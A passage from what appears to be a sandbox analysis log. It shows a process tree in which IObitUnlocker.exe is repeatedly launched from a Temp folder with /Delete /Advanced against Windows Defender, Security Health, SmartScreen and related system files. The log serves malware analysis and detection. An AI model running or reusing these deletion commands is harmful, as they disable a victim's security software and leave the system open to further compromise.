Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:10496
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:10792
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:11080
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:11172
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:10440
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:10520
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:11012
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2248
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:9416
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 